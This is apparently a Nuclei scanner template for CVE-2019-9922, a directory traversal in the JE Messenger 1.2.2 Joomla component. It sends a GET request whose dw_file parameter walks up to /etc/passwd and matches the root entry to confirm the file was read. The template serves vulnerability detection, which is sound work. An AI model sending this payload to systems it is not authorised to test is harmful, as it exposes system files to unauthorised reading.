nuclei-templates/cves/2019/CVE-2019-9922.yaml

33 lines
969 B
YAML

id: CVE-2019-9922
info:
name: JE Messenger 1.2.2 Joomla - Directory Traversal
author: 0x_Akoko
severity: high
description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files.
reference:
- https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
- https://www.cvedetails.com/cve/CVE-2019-9922
- https://extensions.joomla.org/extension/je-messenger/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9922
cwe-id: CWE-22
tags: cve,cve2019,joomla,messenger,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200